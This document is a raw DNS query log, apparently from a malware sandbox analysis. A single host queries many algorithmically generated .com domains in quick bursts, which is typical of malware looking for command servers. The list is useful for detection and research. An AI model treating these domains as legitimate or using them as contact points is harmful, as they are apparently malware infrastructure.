                                                                                                                                                                                                              Aug 23, 2024 18:48:23.532422066 CEST192.168.2.41.1.1.10xc1b4Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.533051968 CEST192.168.2.41.1.1.10x5717Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.533533096 CEST192.168.2.41.1.1.10x241bStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.533934116 CEST192.168.2.41.1.1.10x59ceStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.534445047 CEST192.168.2.41.1.1.10x7dcaStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.534647942 CEST192.168.2.41.1.1.10x839Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.534981012 CEST192.168.2.41.1.1.10x8927Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.535273075 CEST192.168.2.41.1.1.10x37acStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.535805941 CEST192.168.2.41.1.1.10x9af4Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.536309004 CEST192.168.2.41.1.1.10xf5eStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.536780119 CEST192.168.2.41.1.1.10x629cStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.537252903 CEST192.168.2.41.1.1.10x4372Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.537744045 CEST192.168.2.41.1.1.10x88fStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.538258076 CEST192.168.2.41.1.1.10x47aeStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.538535118 CEST192.168.2.41.1.1.10x7f63Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.538619995 CEST192.168.2.41.1.1.10x6d8cStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539277077 CEST192.168.2.41.1.1.10x7e30Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539380074 CEST192.168.2.41.1.1.10xed9Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539788008 CEST192.168.2.41.1.1.10x5b09Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539908886 CEST192.168.2.41.1.1.10xc8a9Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.540429115 CEST192.168.2.41.1.1.10x91fbStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.540445089 CEST192.168.2.41.1.1.10x1e82Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541172981 CEST192.168.2.41.1.1.10x9453Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541276932 CEST192.168.2.41.1.1.10x51ecStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541687012 CEST192.168.2.41.1.1.10xaf4fStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541906118 CEST192.168.2.41.1.1.10x1cd2Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541966915 CEST192.168.2.41.1.1.10x1271Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.542490959 CEST192.168.2.41.1.1.10x8904Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.542979956 CEST192.168.2.41.1.1.10x96e9Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.543459892 CEST192.168.2.41.1.1.10x4f17Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.543915033 CEST192.168.2.41.1.1.10x6078Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.544610977 CEST192.168.2.41.1.1.10x4ff4Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.545221090 CEST192.168.2.41.1.1.10x8626Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.545670986 CEST192.168.2.41.1.1.10xe4d9Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.545670986 CEST192.168.2.41.1.1.10x7931Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.546268940 CEST192.168.2.41.1.1.10x94a8Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.546375036 CEST192.168.2.41.1.1.10x6d11Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.546998024 CEST192.168.2.41.1.1.10xc943Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.547115088 CEST192.168.2.41.1.1.10xa1e8Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.547662973 CEST192.168.2.41.1.1.10x49cdStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.547696114 CEST192.168.2.41.1.1.10x7a68Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.548439026 CEST192.168.2.41.1.1.10xedd1Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.548501968 CEST192.168.2.41.1.1.10xed99Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.549005032 CEST192.168.2.41.1.1.10x20fbStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.549027920 CEST192.168.2.41.1.1.10xd558Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.549457073 CEST192.168.2.41.1.1.10x2c9Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550235987 CEST192.168.2.41.1.1.10x966aStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550261974 CEST192.168.2.41.1.1.10xf397Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550414085 CEST192.168.2.41.1.1.10xea3cStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550757885 CEST192.168.2.41.1.1.10x878eStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551069021 CEST192.168.2.41.1.1.10x8cb1Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551326036 CEST192.168.2.41.1.1.10x5432Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551631927 CEST192.168.2.41.1.1.10xd275Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551915884 CEST192.168.2.41.1.1.10xca47Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.552206039 CEST192.168.2.41.1.1.10xcaa0Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.552534103 CEST192.168.2.41.1.1.10x724fStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.552707911 CEST192.168.2.41.1.1.10x776Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553390980 CEST192.168.2.41.1.1.10x445Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553432941 CEST192.168.2.41.1.1.10x252cStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553545952 CEST192.168.2.41.1.1.10xc63bStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553580999 CEST192.168.2.41.1.1.10x51a4Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553741932 CEST192.168.2.41.1.1.10xa65aStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553778887 CEST192.168.2.41.1.1.10x259fStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553950071 CEST192.168.2.41.1.1.10xd241Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.646929979 CEST192.168.2.41.1.1.10x7e68Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.647690058 CEST192.168.2.41.1.1.10x7102Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.647738934 CEST192.168.2.41.1.1.10x2c40Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.648318052 CEST192.168.2.41.1.1.10x6f38Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.648344994 CEST192.168.2.41.1.1.10x4ea2Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.648857117 CEST192.168.2.41.1.1.10xe0e4Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649350882 CEST192.168.2.41.1.1.10xe704Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649350882 CEST192.168.2.41.1.1.10xa11dStandard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649388075 CEST192.168.2.41.1.1.10x15aeStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649848938 CEST192.168.2.41.1.1.10x6b9Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650068998 CEST192.168.2.41.1.1.10xd28cStandard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650135040 CEST192.168.2.41.1.1.10x884cStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650614023 CEST192.168.2.41.1.1.10xe6caStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650877953 CEST192.168.2.41.1.1.10x6fc1Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650877953 CEST192.168.2.41.1.1.10xeb83Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651424885 CEST192.168.2.41.1.1.10x4db0Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651453018 CEST192.168.2.41.1.1.10x677fStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651912928 CEST192.168.2.41.1.1.10x779dStandard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651912928 CEST192.168.2.41.1.1.10xbd3bStandard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.652369976 CEST192.168.2.41.1.1.10xcc95Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.652385950 CEST192.168.2.41.1.1.10xc110Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.652862072 CEST192.168.2.41.1.1.10xd7ebStandard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653084040 CEST192.168.2.41.1.1.10xf82eStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653115034 CEST192.168.2.41.1.1.10xbe85Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653743029 CEST192.168.2.41.1.1.10x3872Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653798103 CEST192.168.2.41.1.1.10x6e3dStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.654268980 CEST192.168.2.41.1.1.10x70c0Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.654524088 CEST192.168.2.41.1.1.10xe023Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.654540062 CEST192.168.2.41.1.1.10x75a1Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655134916 CEST192.168.2.41.1.1.10xca87Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655210018 CEST192.168.2.41.1.1.10x1a88Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655596972 CEST192.168.2.41.1.1.10xdd74Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655936003 CEST192.168.2.41.1.1.10x9372Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.657912970 CEST192.168.2.41.1.1.10xdb92Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658724070 CEST192.168.2.41.1.1.10x7c9eStandard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658806086 CEST192.168.2.41.1.1.10x4dcStandard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658924103 CEST192.168.2.41.1.1.10xecadStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659145117 CEST192.168.2.41.1.1.10x7031Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659216881 CEST192.168.2.41.1.1.10xbfd8Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659421921 CEST192.168.2.41.1.1.10x4123Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659533978 CEST192.168.2.41.1.1.10x363Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659636974 CEST192.168.2.41.1.1.10x9b60Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659724951 CEST192.168.2.41.1.1.10x8251Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659838915 CEST192.168.2.41.1.1.10x22d5Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659904957 CEST192.168.2.41.1.1.10xba5bStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660031080 CEST192.168.2.41.1.1.10x272cStandard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660099983 CEST192.168.2.41.1.1.10x6cb0Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660209894 CEST192.168.2.41.1.1.10xec50Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660306931 CEST192.168.2.41.1.1.10x6b7cStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660381079 CEST192.168.2.41.1.1.10xb83Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660496950 CEST192.168.2.41.1.1.10x22afStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660548925 CEST192.168.2.41.1.1.10xd79Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660722971 CEST192.168.2.41.1.1.10xcaccStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660747051 CEST192.168.2.41.1.1.10x969aStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660923004 CEST192.168.2.41.1.1.10x7dceStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660960913 CEST192.168.2.41.1.1.10xe48dStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661130905 CEST192.168.2.41.1.1.10x21c9Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661317110 CEST192.168.2.41.1.1.10x7b8bStandard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661343098 CEST192.168.2.41.1.1.10x420bStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661494017 CEST192.168.2.41.1.1.10xd42bStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661560059 CEST192.168.2.41.1.1.10xcd7aStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661711931 CEST192.168.2.41.1.1.10x6c40Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661750078 CEST192.168.2.41.1.1.10x369aStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661906958 CEST192.168.2.41.1.1.10x5a5eStandard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.694346905 CEST192.168.2.41.1.1.10x86d9Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.297363043 CEST192.168.2.41.1.1.10x7957Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.298645020 CEST192.168.2.41.1.1.10x890aStandard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.299717903 CEST192.168.2.41.1.1.10x16ddStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.299808025 CEST192.168.2.41.1.1.10x894Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.299964905 CEST192.168.2.41.1.1.10xb84cStandard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.300383091 CEST192.168.2.41.1.1.10x3b6cStandard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.300853014 CEST192.168.2.41.1.1.10x8d00Standard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.300966978 CEST192.168.2.41.1.1.10x910eStandard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.301599979 CEST192.168.2.41.1.1.10x7aeaStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.301780939 CEST192.168.2.41.1.1.10x8e3bStandard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.304699898 CEST192.168.2.41.1.1.10x4818Standard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.306760073 CEST192.168.2.41.1.1.10x6ac9Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.306931019 CEST192.168.2.41.1.1.10x81cdStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307117939 CEST192.168.2.41.1.1.10x11deStandard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307142973 CEST192.168.2.41.1.1.10x66bdStandard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307293892 CEST192.168.2.41.1.1.10x199eStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307467937 CEST192.168.2.41.1.1.10xcb9bStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307648897 CEST192.168.2.41.1.1.10xc5efStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307739019 CEST192.168.2.41.1.1.10x40eStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307847023 CEST192.168.2.41.1.1.10x2ca7Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.307931900 CEST192.168.2.41.1.1.10xdd3dStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308098078 CEST192.168.2.41.1.1.10x86fdStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308120012 CEST192.168.2.41.1.1.10x5dc4Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308288097 CEST192.168.2.41.1.1.10x251bStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308367968 CEST192.168.2.41.1.1.10xc94cStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308444977 CEST192.168.2.41.1.1.10xfddcStandard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308581114 CEST192.168.2.41.1.1.10x9f0cStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308701992 CEST192.168.2.41.1.1.10xcd4fStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308794022 CEST192.168.2.41.1.1.10x1db9Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.308948994 CEST192.168.2.41.1.1.10x3033Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309032917 CEST192.168.2.41.1.1.10x36e4Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309268951 CEST192.168.2.41.1.1.10x92a0Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309480906 CEST192.168.2.41.1.1.10xd4daStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309551954 CEST192.168.2.41.1.1.10x4c9fStandard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309695005 CEST192.168.2.41.1.1.10x7f93Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309778929 CEST192.168.2.41.1.1.10x5f29Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.309917927 CEST192.168.2.41.1.1.10x91b6Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310017109 CEST192.168.2.41.1.1.10x2c65Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310142994 CEST192.168.2.41.1.1.10xf7e1Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310197115 CEST192.168.2.41.1.1.10xefb4Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310329914 CEST192.168.2.41.1.1.10x5c20Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310367107 CEST192.168.2.41.1.1.10x6b9aStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310537100 CEST192.168.2.41.1.1.10xe37dStandard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310585976 CEST192.168.2.41.1.1.10xfed6Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310729027 CEST192.168.2.41.1.1.10x4514Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310764074 CEST192.168.2.41.1.1.10x573cStandard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310920954 CEST192.168.2.41.1.1.10x422Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.310955048 CEST192.168.2.41.1.1.10x8d59Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311124086 CEST192.168.2.41.1.1.10xa490Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311146021 CEST192.168.2.41.1.1.10x2178Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311325073 CEST192.168.2.41.1.1.10xd7a1Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311351061 CEST192.168.2.41.1.1.10x5ec5Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
